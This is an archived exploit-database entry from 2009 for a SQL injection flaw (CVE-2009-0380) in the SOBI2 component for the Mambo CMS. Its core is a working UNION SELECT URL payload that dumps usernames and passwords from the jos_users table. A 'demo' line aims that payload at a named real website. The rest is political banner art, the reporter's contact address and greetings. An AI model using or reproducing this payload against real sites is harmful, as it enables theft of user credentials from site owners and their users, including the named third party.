Mambo Component SOBI2 RC 2.8.2 bid SQL Injection Vulnerability

2009-01-21T00:00:00
ID EDB-ID:7841
Type exploitdb
Reporter Br1ght D@rk
Modified 2009-01-21T00:00:00

Description

Mambo Component SOBI2 RC 2.8.2 (bid) SQL Injection Vulnerability. CVE-2009-0380. Webapps exploit for php platform

                                        
                                             
                          ||          ||   | ||         
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,  
                  ( :   /    (_)    /           (   .   

      +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
      |                                                           |
      |                   GaZa WiLL NeVeR DiE                     |
      |       		                                          |
      |                                                           |
      |         Proud To Be A MusLiM , Proud To Be A EgYpTiaN     |
      |                                                           |
      +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
 
 
<<!>> Found by  :  Br1ght D@rk
 
<<!>> C0ntact : MiDo2005_2010 [at] hotmail.com  
                    
<<!>> Groups : EgY C0D3RS TeaM , SeCuRiTy G33KS  
 
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
 
 
<<->> D0rk    : find it
 
<<->> Exploit :>>>                
                                    
              :>>>  http://www.site.co.il/index.php?option=com_sobi2&task=showbiz&bid=-78+union+select+0,concat(username,0x3a3a,password),0+from+jos_users--
 
<<->>  DeM00  :>>>  http://www.karmel.co.il/index.php?option=com_sobi2&task=showbiz&bid=-78+union+select+1,concat(username,0x3a3a,password),3+from+jos_users-- 

=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================
 
<<->> All freinds , all muslims , Egy C0ders , AsbMay Group,sec-geeks.com 

                                  <--[ sec-geeks.com ]-->

# milw0rm.com [2009-01-21]